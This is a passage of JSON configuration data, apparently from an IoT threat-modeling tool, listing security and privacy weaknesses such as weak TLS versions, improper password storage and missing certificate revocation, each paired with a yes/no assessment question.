containerisation, or hardware mechansims?  ","propertyID":"532fc4c6-b14f-4b9a-b033-f4aaf0d63e25"},{"ID":"2f0371b7-d68e-4ee7-ac59-2f2ee0b8bcf6","Name":"Improper input validation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","Question":"Is all data input sanitized and validated before processing?","propertyID":"1c1a93cf-acce-4f57-a210-e0b5058f57b8"},{"ID":"50c49be8-97f0-42f3-816e-94bea0b35d02","Name":"Keys not stored in security module","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Are keys stored in a cryptographic vault, such as a trusted platform module (TPM), secure element (SE), or hardware security module (HSM)? ","propertyID":"64bb2754-a187-47c8-aa93-e599f0a97a57"},{"ID":"3a5c0215-3d89-429a-8cff-becff1a625f3","Name":"Missing key encryption","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Are keys encrypted using a key encryption key (KEK)? ","propertyID":"b6c0efb3-7db3-4dd8-8c60-620027eefa3e"},{"ID":"3bd6ada0-7f40-4b6a-83cf-502b1eb1a9a5","Name":"Key usage in untrusted environment","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Are cryptographic operations (such as key access, encryption, and signing) executed in a trusted environment (e.g. separate module)?","propertyID":"b43ada71-51c6-4f5e-b310-a1735a41e602"},{"ID":"575c4c06-6b6f-4982-8f57-d0cf074d0cc9","Name":"Missing tamper resistant unique ID","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","Question":"Is the device uniquely identifiable (the ID is factory-set and tamper resistant stored in hardware)?","propertyID":"08ee42e8-3525-4767-98e3-f7492f356d2f"},{"ID":"e3f323c6-a0f4-46bb-ba3b-418970e02d7c","Name":"Missing unique user identification","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Question":"Are users identified by a unique identifier? ","propertyID":"6391f8f2-eb04-4caf-b490-49c920315867"},{"ID":"207a9b2c-de5c-48a0-9e60-d55de9b13cb3","Name":"Missing privilege differentiation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Question":"Is it possible to assign different privileges to users?","propertyID":"cdb65d33-946e-412e-838b-3075e928c4f0"},{"ID":"4ecc4eda-a2e0-4d3e-8bcc-9a606acb2d84","Name":"Improper password storage","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Question":"Are passwords stored properly, i.e. using a cryptographic hash function (specifically for passwords) along with a unique unpredictable salt?","propertyID":"984400a6-7bd6-4031-a40c-06f0499e0d86"},{"ID":"ab722480-937d-4b08-98ec-fa7898115e4e","Name":"Missing certificate chain verification","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Is the entire certificate chain validated before trusting a certificate?","propertyID":"20b12b0e-4031-4eb3-ad39-f91489884490"},{"ID":"5670d86c-cde0-4655-880b-8c5338b97ca2","Name":"Certificate expiration","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Is there a secure and reliable way to update certificates?","propertyID":"e09bd987-fbf4-4f3d-afeb-033e5bdcb7f8"},{"ID":"5009ecdf-c775-40ff-88a4-842d4750ab8c","Name":"Revoked certificate","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Is it possible to revoke a certificate / check a certificate against a revocation list?","propertyID":"c9d634b6-7eb8-4210-9e97-58e93a5c09a0"},{"ID":"70a2fe78-06b8-4635-8c04-62d2eff0b793","Name":"Uncleared user data","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Question":"Does a factory reset remove all user data/credentials stored on the device?","propertyID":"e6ee6f25-6e52-4f43-93c4-7ef35eb97024"},{"ID":"24dbb5ec-273d-4b9d-be56-c61c06f6d907","Name":"Unhandled exceptions","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","Question":"Can unhandled exceptions occur?","propertyID":"897ef1fd-f1e7-4527-89e3-2cdaf2c8644a"},{"ID":"36e20d86-a97e-4f58-bded-6fabd6455ca2","Name":"Sensitive (error) information exposed ","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","Question":"Do error messages reveal details about the internal state (e.g. stack information, path, passwords)?","propertyID":"f7733c50-2529-459f-9397-8d06f231121c"},{"ID":"d8b6dea3-2785-47f9-8a49-f77031620844","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are configuration changes logged?","propertyID":"0bd863c2-5505-4226-9b28-bab9715c99d1"},{"ID":"3c8b59af-daec-41fc-91a2-798dba990138","Name":"Unsecure mode","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Question":"Is the security mode \'Sign\' or \'SignAndEncrypt\'?","propertyID":"4338e868-4e3c-4473-ba27-6148e8b1fc0f"},{"ID":"9e121d1d-f4da-4ca3-bc88-e4669388bf53","Name":"Missing user authentication","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Question":"Are all users authenticated (identifier \'anonymous\' is not allowed)? ","propertyID":"1e3a8fb8-4a34-44be-8168-996a7e0283f1"},{"ID":"dc941be3-a445-4474-98ff-4b19af31772c","Name":"Weak cryptographic algorithms","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Question":"Is a strong security policy chosen that uses strong cryptographic algorithms?","propertyID":"3f4c724d-3d4d-4b6b-9252-ef43b4240d79"},{"ID":"3d3eb2da-41ed-4f3d-8851-c03422948c97","Name":"Missing certificate","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Question":"Are only connections accepted that provide a trusted certificate?","propertyID":"34344cae-d072-4901-a7be-4084a2534b45"},{"ID":"bb58f761-c25c-4f98-9b41-26320247b929","Name":"Unsecure protocols","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Does the sever use secure protocols?","propertyID":"9ea829dc-59d5-437c-8d24-9908feac2941"},{"ID":"484a3974-f2e1-4535-905b-c7da674c3951","Name":"Unsecure SSL/TLS version","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Does the server use at least TLS 1.2 and older versions of SSL/TLS are disabled?","propertyID":"aa99758d-30a6-4e0f-9d11-1d46c0f43d6c"},{"ID":"a9b8f571-99ec-471e-9bf0-6144757681d9","Name":"Exposes server version","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Has the server a version banner?","propertyID":"6faf97a0-6039-4b7b-ba7c-6b9ef003ede3"},{"ID":"023c9fa3-b198-4038-9d04-17ad84d15f76","Name":"Missing patches","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Is the sever regular updated and patched?","propertyID":"defc6bcc-2bc9-457a-abab-666ec78d4f73"},{"ID":"db5fb272-c8bc-4f16-a6c9-37c80bd4225c","Name":"Missing web application firewall","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Does the system deploy a web application firewall (WAF)?","propertyID":"6f65b93f-53ad-424f-a81b-4777ad48ec97"},{"ID":"d39b86e3-5ed9-4e92-a0c6-2103aee69114","Name":"Undetected misuse of API","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Are all API calls monitored for potential API misuse?","propertyID":"b125fa52-c06e-4e54-88b5-5e9d3929f643"},{"ID":"2bf5c055-bca4-490c-90dd-5e967b925a75","Name":"Unsecure management access","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","Question":"Is the access for device management secured (unique password/certificate, MFA, etc.)?","propertyID":"6962d897-bf88-4745-9f2c-a8aa9d981f93"},{"ID":"facbd825-63f0-4a9b-b357-1035efe81c50","Name":"Unsecure message","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","Question":"Are only messages on port 8883 sent (MQTT over TLS)?","propertyID":"6d7716ae-9870-46a1-9231-a713a0dcd5a0"},{"ID":"da6c4bc6-6173-4e55-9559-296e1c52d086","Name":"Client spoofing","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","Question":"Is the client authenticated and authorized using its own X.509 certificate?","propertyID":"de628891-642c-4b7c-b88b-abf7988721dc"},{"ID":"c1284da0-cb8e-47bc-acf4-a09856baf20b","Name":"No privacy impact assessment","Description":"The PIA should address the following at minimum: identification of sensitive data stored on the device, mechanisms used to inform users of data collected; consent for data collection; processes for use and review of personal data before it is transferred, notice concerning the timing and frequency of data collection, and the ability for users to opt-in or out of data sharing.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Is a privacy impact assessment conducted?","propertyID":"8f4a0dd3-2083-42eb-89bd-48480a082342"},{"ID":"4a2dccf6-91b4-4719-b9cb-d89651045673","Name":"Outdated privacy impact assessment","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Is the privacy impact assessment regularly updated (e.g. annually)?","propertyID":"f3d756ae-7451-4738-986c-0e15d22cb2b2"},{"ID":"a0647742-dcb0-4706-9cdf-a6b969bf3e76","Name":"No safety impact assessment","Description":"Evaluate the safety impacts of an IoT system, log all safety risks, prioritize the risks, and implement mitigations for each risk. Incorporate device and environmental controls to enforce safety requirements, as necessary","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"be1f1524-fd62-4957-a08d-844b070dbb00","Question":"Is a safety impact assessment conducted?","propertyID":"a1e7923f-848d-4532-b967-700925af1a77"},{"ID":"f32f6039-042f-4dc2-a8ef-ba75c463cb46","Name":"No fault tree analysis","Description":"Conduct fault tree analysis to identify and prioritize safety risks associated with the IoT system.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"be1f1524-fd62-4957-a08d-844b070dbb00","Question":"Is a fault tree analysis conducted?","propertyID":"d0e4fa19-2b29-48b3-b81b-2be909af26d8"},{"ID":"dd4edd5b-398c-40d1-8d1d-239e9e63827e","Name":"No account management","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","Question":"Is there a regular audit of the account management (user, administrator, etc.)?","propertyID":"524e227d-483e-45ae-b002-3041d15fe7e9"},{"ID":"b89dd14a-9e2b-46eb-9236-92968ed70fdb","Name":"Weak authentication","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","Question":"Is certificate-based authentication used to access the system?","propertyID":"330a4f44-1471-460d-889f-4f33a3b8ce72"},{"ID":"50aceb90-7382-434f-bc25-278df0527b49","Name":"Root privileges","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Is the service running with root privileges?","propertyID":"39de06c5-7cfc-4fb8-8a1f-22a8888cf4ed"},{"ID":"da56feac-ab79-46ba-82df-b6529f907327","Name":"Certificates with long lifetime","Description":"Device certificates may be used without expiration. In this case, short-term operational certificates should be established.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Question":"Is the lifetime of operational certificates no longer than 3 years?","propertyID":"40c05808-37a1-4394-a9d5-8491b55c3a9b"},{"ID":"f327dd5b-67d4-42ca-af4c-a67f70ed2c0e","Name":"No revocation process","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Question":"Is there a process for certificate revocation?","propertyID":"083e93ef-da95-4064-a698-6fbd5cf997f5"},{"ID":"8278b519-37ca-4689-9ae7-8b65bf16137b","Name":"No management policy","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Question":"Is there a certificate management policy (creation, processing, storage, etc.)?","propertyID":"46d35b81-19e3-404e-9fe2-af5088971ffe"},{"ID":"ca2da121-e451-497b-9c49-5126d497589d","Name":"No automated renewal process","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Question":"Is there an automated process to renew certificates?","propertyID":"0c0d40fd-7f0a-412d-ae80-efce58906308"},{"ID":"884ab7b7-1449-4400-8098-eb803094dace","Name":"No incident response team","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","Question":"Is there a incident response team within the organization?","propertyID":"263b5363-2c09-45dd-8ff8-1a430fb7e93a"},{"ID":"b3066f22-a08d-4b53-b75a-bc918a24d326","Name":"No supply chain risk management program","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","Question":"Is there a established supply chain risk management program?","propertyID":"7e3faca4-9b7a-4f8e-8fbe-cb461ca6870f"},{"ID":"7d1d4c4f-21e6-4042-9562-793624b85352","Name":"Risks from third party components","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","Question":"Are third party components (hardware, software) tracked, monitored, and regularly updated?","propertyID":"2614fc88-29cb-4d84-9902-5f7ca7f98410"},{"ID":"a1c43a03-c0a6-4f68-acce-f2bec5433535","Name":"No regular penetration tests","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"8902950a-6c5e-426b-baa2-71794e74f720","Question":"Are penetration tests regularly (at least annually) performed?","propertyID":"d4cb3498-4689-49f2-9f37-8bd45e62a972"},{"ID":"95c83fe6-0e68-4678-ab47-adb9e128ab28","Name":"Missing privacy measures","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Are appropriate technical and operational measures (e. g. data pseudoymisation, data minimisation) implemented?","propertyID":"2a4c8bb7-bd16-4eee-847f-25090eac2d7e"},{"ID":"8d01ce56-3aa8-449d-935d-558d34f283ba","Name":"Privacy law compliance","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Does the system comply with all privacy laws that govern user control over their personal data?","propertyID":"1bd8c924-5f59-42db-a9b2-a4527c46adf2"},{"ID":"2b64e6da-40c0-483c-82d9-e2018f174ab5","Name":"User rights and freedoms violation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Does the system implement appropriate technical and operational measures for the protection of users rights and freedoms (e. g. transparent information, right of access, right to erasure)?","propertyID":"e79dc2a3-1af9-4a37-b649-9db68eacfc9f"},{"ID":"a6980e98-7544-4b51-b91c-9297025dbd5a","Name":"Insufficient user awareness","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Are users sufficiently aware what personal data is being exposed to the manufacturer, operator, and other partner organisations?","propertyID":"2dd7688c-eddf-4cfa-a496-8c1a46963c89"},{"ID":"93aaeb8f-1493-4904-ac3b-7f0046eb8416","Name":"Missing opt-in mechanism","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Does the system implement an opt-int mechanism to get explicit user consent for personal data processing?","propertyID":"d9b40dd2-e5eb-485d-9cf5-db2ac441c899"},{"ID":"e24d7ef1-fe5f-49a9-a2da-ebff96c0e91d","Name":"Missing SDL program","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Is a Secure Development Plan (SDL) implemented (e.g. based on ISO/IEC 27034)?","propertyID":"e1cdca4d-c2a2-48a1-be0e-93af41cd458c"},{"ID":"0157632b-3385-48b4-b168-ce7fa7a54a6e","Name":"Missing responsibility for regulatory compliance","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Do you have a group and organization responsible for regulatory compliance of security, privacy and data protection, and safety? ","propertyID":"9db73879-4ec7-46ae-a8d9-1b555aac6954"},{"ID":"e7ff7061-d8ee-44b1-97e0-e1a0c33e0439","Name":"Missing responsibility for security compliance","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Do you have a group responsible for security compliance and quality control?","propertyID":"f3a7b4b7-2ff8-45e8-be0e-321f8d9304a1"},{"ID":"2fa7f875-077d-40c1-8a63-e3378eb27740","Name":"Missing responsibility for auditing","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Do you have a responsible group for auditing?","propertyID":"8fda48d4-746b-4915-b0d2-55c9b68fbd99"},{"ID":"3636d9df-25b9-4fe0-85bd-f89b9de5f3ab","Name":"Missing testing","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Does your SDL program include internal functional and security testing of the system?","propertyID":"e6f155e1-51e1-4297-80d9-a6a3beef3657"},{"ID":"ef2dfbad-5621-44e0-97b3-0a0519e30e3a","Name":"Missing trusted execution environment","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the Trusted Computing Base utilize a Trusted Execution Environment for isolation of critical operations?","propertyID":"22e9ef37-20a4-4b6c-ba68-ecc90f1d152f"},{"ID":"763bd11d-5e64-4a98-b7e6-acd696199b16","Name":"Missing isolation of cryptographic operations","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Are cryptographic operations (encryption, message signing, key exchange, key storage) performed by the Trusted Computing Base?","propertyID":"28c99516-8651-452e-86f7-ce00df632c8d"},{"ID":"9dcc369c-f1a3-4d46-801a-2897376d14ed","Name":"Decryption of recorded traffic","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Is Perfect Forward Secrecy (PFS) implemented whenever possible/required?","propertyID":"6cce79b8-3df2-4eda-8892-e83b6a2ee603"},{"ID":"631e6457-1f3d-48e8-b9bb-3a0adfe1f0df","Name":"No external audit","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"8902950a-6c5e-426b-baa2-71794e74f720","Question":"Are audits regularly performed by external institutes?","propertyID":"5f7c116c-e2a5-49af-bfd6-9c38541b6a77"},{"ID":"b1270172-52a3-4da4-84bf-ce87f1d3fb69","Name":"Missing employee training and awareness","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Is there a holistic security training and awareness program for employees?","propertyID":"976c15a1-9170-4a2b-a41c-f1dfb4688b1e"},{"ID":"36c1ec42-a9cc-4599-9222-c640986517bc","Name":"No regular employee training","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Is there a continuous, regular and frequently security training for employees? ","propertyID":"f2e2201c-bd33-4dbd-a8ca-1f3a6d16eb9f"},{"ID":"13f28c81-41ca-4a71-9ee3-5e4dfc0957ca","Name":"No secure coding guidelines","Description":"Secure coding practices include, for example, input validation, output encoding, session management, and database security.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Are secure coding guidelines implemented?","propertyID":"60fadd09-661b-494a-bcac-f0a652172a50"},{"ID":"f9e03fa2-45ec-468c-9e9d-0737ab21437e","Name":"Missing end of support date","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","Question":"Is there a publicly available date for the end of support?","propertyID":"ec622fb4-b851-4c4f-94dc-d5f5b1a6f85d"},{"ID":"3943ab74-ba91-4ea5-a512-955b63b04f1f","Name":"Missing update interval information","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","Question":"Is a rough update interval publicly available for customers?","propertyID":"53ceef04-26a6-46a6-834d-bb9c0df2a24d"},{"ID":"327654e1-de90-4d85-aed0-76c8725763ee","Name":"Missing update notification","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","Question":"If updates are not applied automatically: is there a process for notifying customers about a new update?","propertyID":"7da73f3c-b3f6-4d35-ae19-c60ed655b14c"},{"ID":"a5bb61b3-b5e1-4d10-a2ca-0bff5aed145e","Name":"Missing time synchronization","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Does the system provide the ability to synchronize the system time?","propertyID":"8643278b-1ab3-4359-9ab9-f3911bf336e6"},{"ID":"983e0974-75fe-4359-9384-52654c317b42","Name":"Message sniffing","Description":"Like HTTPS, WSS (WebSockets over SSL/TLS) is encrypted, thus protecting against man-in-the-middle 